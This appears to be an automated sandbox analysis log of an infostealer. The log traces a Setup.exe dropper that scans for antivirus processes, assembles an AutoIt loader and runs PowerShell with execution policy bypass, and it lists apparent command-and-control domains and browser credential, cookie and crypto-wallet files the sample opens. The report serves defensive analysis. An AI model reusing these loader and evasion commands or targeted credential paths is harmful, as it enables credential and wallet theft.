            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_00292992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00292992
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_00280BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00280BAF
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_00280D45 SetUnhandledExceptionFilter,11_2_00280D45
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_00280F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00280F91

            HIPS / PFW / Operating System Protection Evasion

            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: bashfulacid.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: tentabatte.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: curverpluch.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: talkynicer.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: shapestickyr.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: manyrestro.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: slipperyloo.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: wordyfindy.lat
            Source: Hc.com, 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: hungrypaster.click
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002C1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_002C1B4D
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_0026338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_0026338B
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002CBBED SendInput,keybd_event,11_2_002CBBED
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Code function: 11_2_002CEC6C mouse_event,11_2_002CEC6C
            Source: C:\Users\user\Desktop\Setup.exe    Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd
            Source: C:\Windows\SysWOW64\cmd.exe    Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe    Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exe    Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe    Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exe    Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 280366
            Source: C:\Windows\SysWOW64\cmd.exe    Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Agrees
            Source: C:\Windows\SysWOW64\cmd.exe    Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Travels" Served
            Source: C:\Windows\SysWOW64\cmd.exe    Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I
            Source: C:\Windows\SysWOW64\cmd.exe    Process created: C:\Users\user\AppData\Local\Temp\280366\Hc.com Hc.com I
            Source: C:\Windows\SysWOW64\cmd.exe    Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.com    Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="rskevrb4u02flfvl.7vqxymyvwenwhkb2ykr86bmjbm-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive 
information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="rskevrb4u02flfvl.7vqxymyvwenwhkb2ykr86bmjbm-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002C14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_002C14AE
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002C1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_002C1FB0
            Source: Hc.com, 0000000B.00000003.1997077230.0000000004809000.00000004.00000800.00020000.00000000.sdmp, Hc.com, 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp, Hc.com.1.dr, Developers.8.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Hc.comBinary or memory string: Shell_TrayWnd
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_00280A08 cpuid 11_2_00280A08
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002BE5F4 GetLocalTime,11_2_002BE5F4
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002BE652 GetUserNameW,11_2_002BE652
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0029BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_0029BCD2
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara matchFile source: Process Memory Space: Hc.com PID: 7836, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Hc.com, 0000000B.00000003.2067214936.00000000043A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: llets/Electrum-LTCIV
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: Hc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: Hc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
            Source: Hc.com, 0000000B.00000002.2324659198.0000000004363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: Hc.com, 0000000B.00000002.2324147573.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
